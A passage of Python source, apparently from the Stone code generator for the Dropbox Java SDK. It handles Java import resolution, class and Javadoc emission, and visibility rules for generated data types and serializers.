# we always prefer package-local imports, otherwise we can't determine at name
# resolution time whether a package-local class needs to be fully-qualified or
# not. This means we essentially block all imports that clash with package-local
# class names.
if import_.package == self._class.package:
existing_import = existing_names[import_.name]
self._imports.remove(existing_import)
existing_names[import_.name] = import_
self._imports.add(import_)
else:
# leave the existing import alone
pass
else:
# new import
existing_names[import_.name] = import_
self._imports.add(import_)
def add_imports_for_namespace(self, namespace):
assert isinstance(namespace, ApiNamespace), repr(namespace)
self.add_imports(
'com.dropbox.core.DbxException',
'com.dropbox.core.DbxWrappedException',
'com.dropbox.core.http.HttpRequestor',
'com.dropbox.core.v2.DbxRawClientV2',
'java.util.HashMap',
'java.util.Map',
)
for route in namespace.routes:
self.add_imports_for_route(route)
def add_imports_for_route(self, route):
assert isinstance(route, ApiRoute), repr(route)
j = self._j
self._add_imports_for_data_type(route.arg_data_type)
self._add_imports_for_data_type(route.result_data_type)
self._add_imports_for_data_type_exception(route.error_data_type)
if j.has_builder(route) and j.has_arg(route) and j.has_builder(route.arg_data_type):
self._add_imports_for_data_type_builder(route.arg_data_type)
if is_struct_type(route.arg_data_type):
if j.has_builder(route):
fields = route.arg_data_type.all_required_fields
else:
fields = route.arg_data_type.all_fields
for field in fields:
self.add_imports_for_field(field)
if j.request_style(route) == 'upload':
self.add_imports('com.dropbox.core.DbxUploader')
if j.has_builder(route):
self.add_imports('com.dropbox.core.v2.DbxUploadStyleBuilder')
elif j.request_style(route) == 'download':
self.add_imports(
'com.dropbox.core.DbxDownloader',
'com.dropbox.core.v2.DbxDownloadStyleBuilder',
'java.util.Collections',
'java.util.List',
'java.util.Map',
)
def add_imports_for_route_builder(self, route):
assert isinstance(route, ApiRoute), repr(route)
j = self._j
assert j.has_builder(route), repr(route)
if j.has_arg(route) and j.has_builder(route.arg_data_type):
self._add_imports_for_data_type_builder(route.arg_data_type)
self._add_imports_for_data_type(route.result_data_type)
self._add_imports_for_data_type_exception(route.error_data_type)
namespace = j.route_namespace(route)
self.add_imports(
j.java_class(namespace),
'com.dropbox.core.DbxException',
)
for field in route.arg_data_type.all_optional_fields:
self.add_imports_for_field(field)
if j.request_style(route) == 'download':
self.add_imports(
'com.dropbox.core.v2.DbxDownloadStyleBuilder',
'com.dropbox.core.DbxDownloader',
)
elif j.request_style(route) == 'upload':
self.add_imports('com.dropbox.core.v2.DbxUploadStyleBuilder')
def add_imports_for_route_uploader(self, route):
self.add_imports(
'com.dropbox.core.DbxWrappedException',
'com.dropbox.core.DbxUploader',
'com.dropbox.core.http.HttpRequestor',
'java.io.IOException',
)
self._add_imports_for_data_type(route.result_data_type)
self._add_imports_for_data_type_exception(route.error_data_type)
def add_imports_for_data_type(self, data_type, include_serialization=True):
assert isinstance(data_type, DataType), repr(data_type)
assert is_user_defined_type(data_type), repr(data_type)
j = self._j
# for hash code computation
if data_type.fields or (is_union_type(data_type) and not j.is_enum(data_type)):
self.add_imports('java.util.Arrays')
self._add_imports_for_data_type(data_type)
if include_serialization:
self._add_imports_for_data_type_serializers(data_type)
for field in data_type.all_fields:
self.add_imports_for_field(field)
# for regex pattern validation
if is_string_type(field.data_type) and field.data_type.pattern is not None:
self.add_imports('java.util.regex.Pattern')
# check if we need to import parent type
if is_struct_type(data_type) and data_type.parent_type:
self._add_imports_for_data_type(data_type.parent_type)
def add_imports_for_exception_type(self, data_type):
j = self._j
self.add_imports(
'com.dropbox.core.DbxApiException',
'com.dropbox.core.LocalizedText',
j.java_class(data_type),
)
def add_imports_for_field(self, field):
self._add_imports_for_data_type(field.data_type)
def _add_imports_for_data_type(self, data_type):
j = self._j
if is_user_defined_type(data_type):
self.add_imports(j.java_class(data_type))
else:
java_type = _TYPE_MAP_UNBOXED.get(data_type.name)
if java_type and '.' in java_type:
self.add_imports(java_type)
if is_list_type(data_type) or is_nullable_type(data_type):
self._add_imports_for_data_type(data_type.data_type)
elif is_map_type(data_type):
self._add_imports_for_data_type(data_type.value_data_type)
elif is_timestamp_type(data_type):
self.add_imports('com.dropbox.core.util.LangUtil')
def _add_imports_for_data_type_builder(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
j = self._j
self.add_imports(j.builder_class(data_type))
def _add_imports_for_data_type_exception(self, data_type):
j = self._j
if is_void_type(data_type):
self.add_imports('com.dropbox.core.DbxApiException')
else:
self.add_imports(
j.java_class(data_type),
j.exception_class(data_type),
)
def _add_imports_for_data_type_serializers(self, data_type):
self.add_imports(
'java.io.IOException',
'com.fasterxml.jackson.core.JsonGenerationException',
'com.fasterxml.jackson.core.JsonGenerator',
'com.fasterxml.jackson.core.JsonParseException',
'com.fasterxml.jackson.core.JsonParser',
'com.fasterxml.jackson.core.JsonToken',
'com.dropbox.core.stone.StoneSerializers',
'com.dropbox.core.stone.StoneDeserializerLogger',
)
if is_struct_type(data_type):
self.add_imports('com.dropbox.core.stone.StructSerializer')
elif is_union_type(data_type):
self.add_imports('com.dropbox.core.stone.UnionSerializer')
def __repr__(self):
return '{}(class={},imports={})'.format(type(self).__name__, self._class, self._imports)
class JavaClassWriter:
def __init__(self, g, j, refs, java_class, stone_element=None, package_doc=None):
assert isinstance(java_class, JavaClass), repr(java_class)
assert java_class.package, repr(java_class)
self.importer = JavaImporter(java_class, j)
self._g = g
self._j = j
self._refs = refs
self._class = java_class
self._stone_element = stone_element
self._package_doc = package_doc
if package_doc:
assert java_class.name == 'package-info', "Only package-info.java files can contain package Javadoc"
def _mkdirs(self, path):
if not os.path.isdir(path):
self._g.logger.info('Creating directory %s', path)
os.makedirs(path)
def __enter__(self):
components = self._class.import_class.fq.split('.')
path = os.path.join(*components)
self._mkdirs(os.path.dirname(path))
self._enter_ctx = self._g.output_to_relative_path(path + '.java')
self._enter_ctx.__enter__()
self._emit_header()
if self._package_doc:
self.javadoc(self._package_doc)
self.out('package %s;', self._class.package)
self.out('')
return self
def __exit__(self, exc_type, exc_value, traceback):
ret = self._enter_ctx.__exit__(exc_type, exc_value, traceback)
self._enter_ctx = None
return ret
def fmt(self, fmt_str, *args, **kwargs):
assert isinstance(fmt_str, str), repr(fmt_str)
generics = kwargs.get('generics', True)
# resolve JavaClass to appropriate names based on our current imports
resolved_args = tuple(
self.resolved_class(a, generics=generics) if isinstance(a, JavaClass) else a
for a in args
)
return fmt_str % resolved_args
def out(self, fmt_str, *args, **kwargs):
self._g.emit(self.fmt(fmt_str, *args), **kwargs)
def block(self, fmt_str, *args, **kwargs):
return self._g.block(self.fmt(fmt_str, *args).strip(), **kwargs)
@contextmanager
def conditional_block(self, predicate, fmt_str, *args):
if predicate:
with self.block(fmt_str, *args):
yield
else:
yield
def class_block(self, element, visibility=Visibility.PUBLIC, parent_class=None):
assert isinstance(element, (JavaClass, StoneType)), repr(element)
assert visibility.is_visible, repr((element, visibility))
j = self._j
java_class = j.java_class(element) if isinstance(element, StoneType) else element
modifiers = [visibility.modifier]
class_type = 'class'
class_name = java_class.name_with_generics
inheritance = parent_class
if java_class.is_nested:
modifiers.append('static')
if isinstance(element, DataType):
data_type = element
if j.is_enum(data_type):
class_type = 'enum'
elif is_union_type(data_type):
modifiers.append('final')
elif is_struct_type(data_type) and data_type.parent_type:
assert parent_class is None, repr((data_type, parent_class))
inheritance = j.java_class(data_type.parent_type)
if inheritance:
return self.block('%s %s %s extends %s', ' '.join(modifiers), class_type, class_name, inheritance)
else:
return self.block('%s %s %s', ' '.join(modifiers), class_type, class_name)
def resolved_class(self, val, generics=True):
if isinstance(val, str):
val = JavaClass(val)
else:
assert isinstance(val, JavaClass), repr(val)
return val.resolved_name(self._class, self.importer.imports, generics=generics)
def _emit_header(self):
j = self._j
filenames = j.get_spec_filenames(self._stone_element) if self._stone_element else None
self.out('/* DO NOT EDIT */')
if filenames:
self.out('/* This file was generated from %s */' % ', '.join(filenames))
else:
self.out('/* This file was generated by Stone */')
self.out('')
def write_imports(self):
# start off will all imports, then group into categories
imports = self.importer.imports
# remove package-local imports
imports = {
import_ for import_ in imports
if import_.package != self._class.package
}
# group all our project imports into one spot. use the first two package parts for root corp
# package (e.g. com.foo.core.v2 -> com.foo)
project_package_prefix = '.'.join(self._class.package.split('.', 2)[:2])
project_imports = {
import_ for import_ in imports
if import_.package.startswith(project_package_prefix)
}
imports = imports - project_imports
# now group the rest by the first package part
grouped = defaultdict(set)
for import_ in imports:
root = import_.package.split('.', 1)[0]
grouped[root].add(import_)
# now write out the groups in this order:
#
# project packages
# 3rd party packages
# java
# javax
if project_imports:
for import_ in sorted(project_imports):
self.out('import %s;', import_.import_class.fq)
java_imports = grouped.pop('java', set())
javax_imports = grouped.pop('javax', set())
needs_newline = bool(project_imports)
for _, imports in chain(sorted(grouped.items()), [
('java', java_imports),
('javax', javax_imports)
]):
if imports:
if needs_newline:
self.out('')
needs_newline = True
for import_ in sorted(imports):
self.out('import %s;', import_.import_class.fq)
def java_default_value(self, field):
assert isinstance(field, Field), repr(field)
assert field.has_default, repr(field)
return self.java_value(field.data_type, field.default)
def java_value(self, data_type, stone_value):
assert isinstance(data_type, DataType), repr(data_type)
j = self._j
if data_type.name == 'Boolean':
return 'true' if stone_value else 'false'
elif data_type.name == 'String':
return self.fmt('"%s"', stone_value.replace('\\', '\\\\').replace('"', '\\"'))
elif data_type.name == 'Float32':
return repr(stone_value) + 'f' # append a f at the end for float value
elif data_type.name == 'Float64':
return repr(stone_value) # Because str() drops the last few digits.
elif data_type.name in ('Int64', 'UInt64', 'UInt32'):
return str(stone_value) + 'L' # Need exact type match for boxed values.
elif is_union_type(data_type):
assert isinstance(stone_value, TagRef), (data_type, stone_value)
assert data_type == stone_value.union_data_type, (data_type, stone_value)
for field in data_type.all_fields:
if field.name == stone_value.tag_name:
if j.field_static_instance(field):
value = self.fmt('%s.%s', j.java_class(data_type), j.field_static_instance(field))
else:
assert j.field_factory_method(field)
value = self.fmt('%s.%s()', j.java_class(data_type), j.field_factory_method(field))
return value
else:
assert False, "Could not find tag '{}' in '{}'".format(stone_value.tag_name, data_type)
else:
return str(stone_value)
def java_serializer(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
if is_user_defined_type(data_type):
serializer_class = self._j.serializer_class(data_type)
return self.fmt('%s.INSTANCE', serializer_class)
else:
serializers_class = JavaClass('com.dropbox.core.stone.StoneSerializers')
if is_nullable_type(data_type) and is_struct_type(data_type.data_type):
return self.fmt('%s.nullableStruct(%s)',
serializers_class, self.java_serializer(data_type.data_type))
elif is_nullable_type(data_type):
return self.fmt('%s.nullable(%s)',
serializers_class, self.java_serializer(data_type.data_type))
elif is_list_type(data_type):
# TODO: also support passing collapsed to list serializer
return self.fmt('%s.list(%s)',
serializers_class, self.java_serializer(data_type.data_type))
elif is_map_type(data_type):
return self.fmt('%s.map(%s)',
serializers_class, self.java_serializer(data_type.value_data_type))
else:
return self.fmt('%s.%s()', serializers_class, camelcase(data_type.name))
def javadoc(self, doc,
stone_elem=None,
fields=(),
params=(),
returns=None,
throws=(),
deprecated=None,
allow_defaults=True):
# convenience so we can do "javadoc(field)"
if isinstance(doc, StoneType):
assert stone_elem is None, repr(stone_elem)
stone_elem = doc
assert hasattr(stone_elem, "doc"), repr(stone_elem)
doc = stone_elem.doc
# apply default catch-all documentation to all fields
if not doc and isinstance(stone_elem, UnionField):
if stone_elem == self._j.field_containing_data_type(stone_elem).catch_all_field:
doc = _CATCH_ALL_DOC
doc = doc or ''
assert isinstance(doc, str), repr((doc, stone_elem))
assert isinstance(stone_elem, StoneType) or stone_elem is None, repr(stone_elem)
assert isinstance(fields, Sequence), repr(fields)
assert all(isinstance(f, Field) for f in fields), repr(fields)
assert isinstance(params, (Sequence, OrderedDict)), repr(params)
assert isinstance(returns, (str, StoneType)) or returns is None, repr(returns)
assert isinstance(throws, (Sequence, OrderedDict)), repr(throws)
assert isinstance(deprecated, (ApiRoute, bool)) or deprecated is None, repr(deprecated)
# auto-detect deprecated values
if deprecated is None and stone_elem is not None:
if isinstance(stone_elem, ApiRoute):
deprecation_info = stone_elem.deprecated
if deprecation_info is not None:
deprecated = deprecation_info.by or True
elif isinstance(stone_elem, StructField):
deprecated = stone_elem.deprecated
else:
assert not hasattr(stone_elem, "is_deprecated"), repr(stone_elem)
params_doc = self._javadoc_fields(fields, stone_elem, allow_defaults=allow_defaults)
params_doc.update(self._translate_ordered_collection(params, stone_elem))
if isinstance(returns, StoneType):
returns_doc = self._translate_stone_doc(returns.doc, returns) if hasattr(returns, 'doc') else ''
else:
returns_doc = self._translate_stone_doc(returns, stone_elem)
throws_doc = self._translate_ordered_collection(throws, stone_elem)
deprecated_doc = self._javadoc_deprecated(deprecated)
requires_validation = any(self._field_validation_requirements(f) for f in fields)
if requires_validation:
exception = "IllegalArgumentException"
if exception in throws_doc:
throws_doc[exception] += ". Also thrown if any argument does not meet its preconditions."
else:
throws_doc[exception] = "If any argument does not meet its preconditions."
return self._generate_javadoc_raw(
self._translate_stone_doc(doc, stone_elem),
params=params_doc,
returns=returns_doc,
throws=throws_doc,
deprecated=deprecated_doc,
)
def throws(self, field, value_name=None):
assert isinstance(field, Field), repr(field)
assert value_name is None or isinstance(value_name, str), repr(value_name)
reasons = self._field_validation_requirements(field, as_failure_reasons=True)
throws = OrderedDict()
if reasons:
reasons_list = oxford_comma_list(reasons, conjunction='or')
throws["IllegalArgumentException"] = "if {{@code {}}} {}.".format(value_name, reasons_list)
return throws
def javadoc_ref(self, element, context=None, builder=False):
assert isinstance(element, (JavaClass, StoneType, JavaReference)), repr(element)
assert isinstance(context, StoneType) or context is None, repr(context)
j = self._j
if isinstance(element, JavaClass):
ref = self.fmt("{@link %s}", element)
elif isinstance(element, (ApiRoute, RouteReference)):
route_ref = self._refs.route(element) if isinstance(element, ApiRoute) else element
ref = self._javadoc_route_ref(route_ref, builder=builder)
elif isinstance(element, (DataType, DataTypeReference)):
if isinstance(element, DataType):
if is_user_defined_type(element):
data_type_ref = self._refs.data_type(element)
ref = self._javadoc_data_type_ref(data_type_ref, builder=builder)
else:
ref = self.fmt("{@link %s}", j.java_class(element, generics=False))
else:
data_type_ref = element
ref = self._javadoc_data_type_ref(data_type_ref, builder=builder)
elif isinstance(element, (Field, FieldReference)):
# we need a context for union fields since we copy fields from parents into their
# subclasses. Otherwise, we may make a reference to a field in a non-existing class or
# incorrectly assume the field is an enum constant when it isn't.
field_ref = self._refs.field(element, context) if isinstance(element, Field) else element
ref = self._javadoc_field_ref(field_ref)
else:
raise AssertionError(repr(element))
return sanitize_javadoc(ref)
def _generate_javadoc_raw(self, doc, params=None, returns=None, throws=None, deprecated=None):
# deprecated can be an empty six.text_type, which means no doc
if not any((doc, params, returns, throws, deprecated is not None)):
return
prefix = ' * '
attr_doc_prefix = prefix + (' ' * 4)
def emit_attrs(tag, attrs):
if attrs:
self.out(prefix.rstrip())
attr_prefix = ''.join((prefix, tag, ' '))
for attr_name, attr_doc in attrs.items():
# Javadoc complains about tags that are missing documentation, except for
# @deprecated
if not attr_doc.strip():
if tag == '@deprecated':
self._g.emit_wrapped_text(
tag,
initial_prefix=prefix,
subsequent_prefix=attr_doc_prefix)
continue
if attr_name:
doc_text = ' '.join((attr_name, attr_doc))
else:
doc_text = attr_doc
self._g.emit_wrapped_text(
collapse_whitespace(doc_text),
initial_prefix=attr_prefix,
subsequent_prefix=attr_doc_prefix
)
self.out('/**')
if doc:
first_paragraph = True
for paragraph in split_paragraphs(doc.strip()):
if not first_paragraph:
self.out(prefix.rstrip())
if paragraph:
paragraph = ''.join(('<p> ', paragraph, ' </p>'))
else:
first_paragraph = False
self._g.emit_wrapped_text(paragraph, initial_prefix=prefix, subsequent_prefix=prefix)
emit_attrs('@param', params)
emit_attrs('@return', {"": returns} if returns else None)
emit_attrs('@throws', throws)
# deprecated can be empty string, which still means we should emit
emit_attrs('@deprecated', {"": deprecated} if deprecated is not None else None)
self.out(' */')
# compiler requires a separate annotation outside the javadoc to display warnings about
# using obsolete APIs.
if deprecated is not None:
self.out('@Deprecated')
def _javadoc_fields(self, fields, stone_elem, allow_defaults=True):
j = self._j
params = OrderedDict()
for field in fields:
assert isinstance(field, Field), repr(field)
containing_data_type = j.field_containing_data_type(field)
param_name = j.param_name(field)
param_stone_doc = field.doc or ''
is_catch_all = is_union_type(containing_data_type) and field == containing_data_type.catch_all_field
if not param_stone_doc and is_catch_all:
param_stone_doc = _CATCH_ALL_DOC
context = stone_elem if isinstance(stone_elem, DataType) and field in stone_elem.all_fields else field
param_doc = self._translate_stone_doc(param_stone_doc, field)
# add '.' at end of doc if we have a doc and its missing.
if param_doc.strip() and not param_doc.endswith('.'):
param_doc += '.'
preconditions = self._field_validation_requirements(field)
if preconditions:
param_doc += " Must %s." % oxford_comma_list(preconditions, conjunction='and')
if allow_defaults and isinstance(field, StructField) and field.has_default:
param_doc += " Defaults to {@code %s} when set to {@code null}." % (
self.java_default_value(field)
)
param_doc = param_doc.strip()
if param_doc:
params[param_name] = param_doc
return params
def _javadoc_deprecated(self, deprecated):
assert isinstance(deprecated, (ApiRoute, bool)) or deprecated is None, repr(deprecated)
if isinstance(deprecated, ApiRoute):
return 'use %s instead.' % self.javadoc_ref(deprecated)
elif isinstance(deprecated, bool) and deprecated:
return ''
else:
return None
def _translate_ordered_collection(self, collection, stone_elem):
assert isinstance(collection, (Sequence, types.GeneratorType, OrderedDict)), repr(collection)
if isinstance(collection, OrderedDict):
collection = collection.items()
return OrderedDict(
(param_name, self._translate_stone_doc(doc, stone_elem))
for param_name, doc in collection
)
def _field_validation_requirements(self, field, as_failure_reasons=False):
assert isinstance(field, Field), repr(field)
# field has no value
if is_void_type(field.data_type):
return None
data_type = field.data_type
nullable = is_nullable_type(data_type)
if nullable:
data_type = data_type.data_type
requirements = []
def add_req(precondition, failure_reason):
if as_failure_reasons:
requirements.append(failure_reason)
else:
requirements.append(precondition)
for condition, (precondition, failure_reason) in (
('min_items', ('contain at least %s items', 'has fewer than %s items')),
('max_items', ('contain at most %s items', 'has more than %s items')),
('min_value', ('be greater than or equal to %s', 'is less than %s')),
('max_value', ('be less than or equal to %s', 'is greater than %s')),
('min_length', ('have length of at least %s', 'is shorter than %s')),
('max_length', ('have length of at most %s', 'is longer than %s'))
):
if hasattr(data_type, condition):
val = getattr(data_type, condition)
if val is not None:
add_req(precondition % val, failure_reason % val)
if is_list_type(data_type) or is_map_type(data_type):
add_req('not contain a {@code null} item', 'contains a {@code null} item')
elif is_string_type(data_type) and data_type.pattern is not None:
pattern = sanitize_pattern(data_type.pattern)
add_req('match pattern "{@code %s}"' % pattern, 'does not match pattern "{@code %s}"' % pattern)
if not (nullable or self._j.is_java_primitive(data_type) or is_void_type(data_type)):
add_req('not be {@code null}', 'is {@code null}')
return requirements
def _translate_stone_doc(self, doc, stone_elem=None):
assert isinstance(doc, str) or doc is None, repr(doc)
if doc:
handler = lambda tag, val: self._javadoc_ref_handler(tag, val, stone_elem=stone_elem)
return self._g.process_doc(sanitize_javadoc(doc), handler)
else:
return doc or ''
def _javadoc_ref_handler(self, tag, val, stone_elem=None):
"""
Args:
tag(str): Type of Stone doc reference being made
val(str): The Stone element reference
stone_elem(StoneType): The stone element where this doc is appearing. This
is the context for looking up references. For example, if we are handling
the doc of a struct field, the Field object would be `stone_elem`.
This allows us to look up relative references (e.g. reference another
field within the same containing struct).
"""
element = self._lookup_stone_ref(tag, val, stone_elem)
if element is None and tag in ('route', 'type', 'field'):
self._g.logger.warn('Unable to resolve Stone reference (:{}:`{}`) [ctx={}]'.format(tag, val, stone_elem))
return sanitize_javadoc('{@code %s}' % camelcase(val))
# use {@code ...} tag for unresolved references so we don't have broken links in our Javadoc
if tag == 'route':
ref = self._javadoc_route_ref(element)
elif tag == 'type':
ref = self._javadoc_data_type_ref(element)
elif tag == 'field':
ref = self._javadoc_field_ref(element)
elif tag == 'link':
anchor, link = val.rsplit(' ', 1)
# unsanitize from previous sanitize calls
anchor = unsanitize_javadoc(anchor)
# do not sanitize this HTML
return '<a href="{}">{}</a>'.format(link, anchor)
elif tag == 'val':
# Note that all valid Stone literals happen to be valid Java literals.
ref = '{@code %s}' % val
else:
assert False, 'Unsupported tag (:{}:`{}`)'.format(tag, val)
return sanitize_javadoc(ref)
def _lookup_stone_ref(self, tag, val, stone_elem):
assert isinstance(tag, str), repr(tag)
assert isinstance(val, str), repr(val)
assert isinstance(stone_elem, StoneType) or stone_elem is None, repr(stone_elem)
assert val, repr(val)
j = self._j
def resolve_fq_name(val, max_parts):
try:
parts = split_stone_name(val, max_parts)
except ValueError as e:
# mark tag as invalid... can't raise exception here since we don't validate stone docs
self._g.logger.warn('Malformed Stone reference value: `{}`. {}'.format(val, str(e)))
return None
else:
if stone_elem and None in parts:
context_parts = j.stone_fq_name(stone_elem).split('.')
# pad the end with None's
context_parts += [None, ] * (max_parts - len(context_parts))
parts = [(orig or context) for orig, context in zip(parts, context_parts)]
if None in parts:
return None
else:
return '.'.join(parts)
if tag == 'route':
fq_name = resolve_fq_name(val.replace(":", "_v"), 2)
return self._refs.route(fq_name) if fq_name else None
elif tag == 'type':
fq_name = resolve_fq_name(val, 2)
return self._refs.data_type(fq_name) if fq_name else None
elif tag == 'field':
fq_name = resolve_fq_name(val, 3)
return self._refs.field(fq_name) if fq_name else None
elif tag == 'link':
return None
elif tag == 'val':
return None
else:
assert False, 'Unsupported tag (:{}:`{}`)'.format(tag, val)
def _javadoc_route_ref(self, route_ref, builder=False):
assert isinstance(route_ref, RouteReference), repr(route_ref)
if self._g.args.data_types_only:
return '{@code %s}' % route_ref.url_path
if builder and route_ref.has_builder:
method_name = route_ref.builder_method
method_args = []
else:
method_name = route_ref.method
method_args = [
self.resolved_class(c, generics=False) for c in route_ref.method_arg_classes
]
if method_args:
return self.fmt('{@link %s#%s(%s)}', route_ref.java_class, method_name, ','.join(method_args))
else:
return self.fmt('{@link %s#%s}', route_ref.java_class, method_name)
def _javadoc_data_type_ref(self, data_type_ref, builder=False):
assert isinstance(data_type_ref, DataTypeReference), repr(data_type_ref)
if builder and data_type_ref.has_builder:
java_class = data_type_ref.builder_class
else:
java_class = data_type_ref.java_class
return self.fmt('{@link %s}', java_class)
def _javadoc_field_ref(self, field_ref):
assert isinstance(field_ref, FieldReference), repr(field_ref)
# Address issue T76930:
#
# We want to avoid referencing to `RouteArg` struct classes that are never used in our
# public route methods. When we generate routes with struct args, we generally do it like
# so:
#
# private RouteResult routeName(RouteArg);
# public RouteResult routeName(field1, field2, field3);
# public RouteResultBuilder routeNameBuilder(field1, field2, field3);
#
# So if the field's containing data type is a struct, makre sure the struct is
# public. Otherwise, try to find out if that struct is uniqued used as a route argument and
# make the Javadoc reference point to the route method instead of the struct class.
if field_ref.route_refs and not self._g.args.data_types_only:
# the struct should not appear anywhere else besides as a route argument
return 'the {{@code {}}} argument to {}'.format(
field_ref.param_name,
oxford_comma_list([
self._javadoc_route_ref(route_ref)
for route_ref in field_ref.route_refs
], conjunction='or'),
)
containing_data_type_ref = field_ref.containing_data_type_ref
# can't reference a package-private data type.
assert containing_data_type_ref.visibility.is_visible, repr(field_ref)
# fallback to standard ref
return self.fmt(
'{@link %s#%s}',
containing_data_type_ref.java_class,
field_ref.static_instance or field_ref.getter_method
)
class JavaApi:
def __init__(self, api, generator_args):
self.stone_api = api
self._args = generator_args
self._containing_data_types = self._get_containing_data_types(api)
self._namespaces_by_route = self._get_namespaces_by_route(api)
self._data_types_with_exception = self._get_data_types_with_exception(api)
if generator_args.data_types_only:
self._data_type_visibility = defaultdict(lambda: Visibility.PUBLIC)
self._serializer_visibility = defaultdict(lambda: Visibility.PUBLIC)
self._client_data_types = {
data_type
for namespace in api.namespaces.values()
for data_type in namespace.data_types
}
else:
self._data_type_visibility = self._resolve_data_type_visibility(api)
self._serializer_visibility = self._resolve_serializer_visibility(api)
# data types required for this specific client. We avoid generating data types that aren't
# required by the client.
self._client_data_types = {
data_type for data_type, visibility in self._data_type_visibility.items()
if visibility.is_visible
}
@staticmethod
def _get_containing_data_types(api):
mapping = {}
for namespace in api.namespaces.values():
for data_type in namespace.data_types:
for field in data_type.fields:
mapping[field] = data_type
return mapping
@staticmethod
def _get_namespaces_by_route(api):
mapping = {}
for namespace in api.namespaces.values():
for route in namespace.routes:
mapping[route] = namespace
return mapping
@staticmethod
def _get_data_types_with_exception(api):
data_types = set()
for namespace in api.namespaces.values():
for route in namespace.routes:
if is_user_defined_type(route.error_data_type):
data_types.add(route.error_data_type)
return data_types
@staticmethod
def _resolve_data_type_visibility(api):
visibility = defaultdict(lambda: Visibility.NONE)
def update(data_type, new_visibility):
visibility[data_type] = max(visibility[data_type], new_visibility)
def update_by_reference(data_type, namespace):
if data_type.namespace == namespace:
update(data_type, Visibility.PACKAGE)
else:
update(data_type, Visibility.PUBLIC)
# Calculate initial visibility state based on routes that use our data types.
for namespace in api.namespaces.values():
for route in namespace.routes:
arg = get_underlying_type(route.arg_data_type)
result = get_underlying_type(route.result_data_type)
error = get_underlying_type(route.error_data_type)
if is_user_defined_type(result):
update(result, Visibility.PUBLIC)
if is_user_defined_type(error):
update(error, Visibility.PUBLIC)
if is_user_defined_type(arg):
# Could be something like List(FooArg), in which case, we just make FooArg public.
if arg != route.arg_data_type:
update(arg, Visibility.PUBLIC)
elif is_union_type(arg):
update(arg, Visibility.PUBLIC)
elif is_struct_type(arg):
# We explode structs so that their fields are the arguments to the route
# method. We have to construct an instead of the arg object from our route
# method, so we might be able to make the arg class package-private if it
# isn't referenced anywhere else.
update_by_reference(arg, namespace)
for field in arg.all_fields:
field_data_type = get_underlying_type(field.data_type)
if is_user_defined_type(field_data_type):
update(field_data_type, Visibility.PUBLIC)
# Not iterate repeatedly, cascading the visibility out to other required data types as necessary
prev_state = None
cur_state = visibility.copy()
while prev_state != cur_state:
for namespace in api.namespaces.values():
if namespace.doc is not None:
data_types = parse_data_types_from_doc_ref(api, namespace.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
for data_type in namespace.data_types:
if not visibility[data_type].is_visible:
continue
if data_type.doc is not None:
data_types = parse_data_types_from_doc_ref(api, data_type.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
for field in data_type.all_fields:
field_data_type = get_underlying_type(field.data_type)
# if this data type is public, then all its fields must be public as well
# to ensure they are properly exposed to the user
if is_user_defined_type(field_data_type):
if visibility[data_type] == Visibility.PUBLIC:
update(field_data_type, Visibility.PUBLIC)
else:
# otherwise, just update visibility so this class can properly reference
# the field data type
update_by_reference(field_data_type, namespace)
if field.doc is not None:
data_types = parse_data_types_from_doc_ref(api, field.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
if is_struct_type(data_type):
if data_type.parent_type:
if visibility[data_type] == Visibility.PUBLIC:
update(data_type.parent_type, Visibility.PUBLIC)
else:
# subclasses need access to their parent class
update_by_reference(data_type.parent_type, namespace)
# parents need access to their enumerated subtype classes. If the parent is
# public, then make the sublcasses public too for casting.
if data_type.has_enumerated_subtypes():
for subtype in data_type.get_enumerated_subtypes():
if visibility[data_type] == Visibility.PUBLIC:
update(subtype.data_type, Visibility.PUBLIC)
else:
update_by_reference(subtype.data_type, namespace)
prev_state = cur_state
cur_state = visibility.copy()
return visibility
@staticmethod
def _resolve_serializer_visibility(api):
visibility = defaultdict(lambda: Visibility.NONE)
def update(data_type, new_visibility):
visibility[data_type] = max(visibility[data_type], new_visibility)
def update_by_reference(data_type, namespace):
if data_type.namespace == namespace:
update(data_type, Visibility.PACKAGE)
else:
update(data_type, Visibility.PUBLIC)
# Calculate initial visibility state based on routes that use our data types.
for namespace in api.namespaces.values():
for route in namespace.routes:
for data_type in (route.arg_data_type, route.result_data_type, route.error_data_type):
data_type = get_underlying_type(data_type)
if is_user_defined_type(data_type):
update_by_reference(data_type, namespace)
# Not iterate repeatedly, cascading the visibility out to other required data types as necessary
prev_state = None
cur_state = visibility.copy()
while prev_state != cur_state:
for namespace in api.namespaces.values():
if namespace.doc is not None:
data_types = parse_data_types_from_doc_ref(api, namespace.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
for data_type in namespace.data_types:
if not visibility[data_type].is_visible:
continue
if data_type.doc is not None:
data_types = parse_data_types_from_doc_ref(api, data_type.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
for field in data_type.all_fields:
field_data_type = get_underlying_type(field.data_type)
if is_user_defined_type(field_data_type):
update_by_reference(field_data_type, namespace)
if field.doc is not None:
data_types = parse_data_types_from_doc_ref(api, field.doc, namespace.name,
ignore_missing_entries=True)
for d in data_types:
update_by_reference(d, namespace)
# parents need access to their enumerated subtype serializers
if is_struct_type(data_type) and data_type.has_enumerated_subtypes():
for subtype in data_type.get_enumerated_subtypes():
update_by_reference(subtype.data_type, namespace)
prev_state = cur_state
cur_state = visibility.copy()
return visibility
@staticmethod
def get_spec_filename(element):
assert isinstance(element, StoneType), repr(element)
assert hasattr(element, '_ast_node'), repr(element)
return os.path.basename(element._ast_node.path)
def get_spec_filenames(self, element):
assert isinstance(element, StoneType), repr(element)
filenames = OrderedDict() # ordered set
if isinstance(element, ApiNamespace):
for child in chain(element.data_types, element.routes):
filenames[self.get_spec_filename(child)] = None
else:
filenames[self.get_spec_filename(element)] = None
return filenames.keys()
@staticmethod
def requires_validation(data_type):
assert isinstance(data_type, DataType), repr(data_type)
if is_list_type(data_type) or is_map_type(data_type):
return True
elif is_numeric_type(data_type):
return any(r is not None for r in (
data_type.min_value,
data_type.max_value,
))
elif is_string_type(data_type):
return any(r is not None for r in (
data_type.min_length,
data_type.max_length,
data_type.pattern,
))
else:
return False
def is_collapsible(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
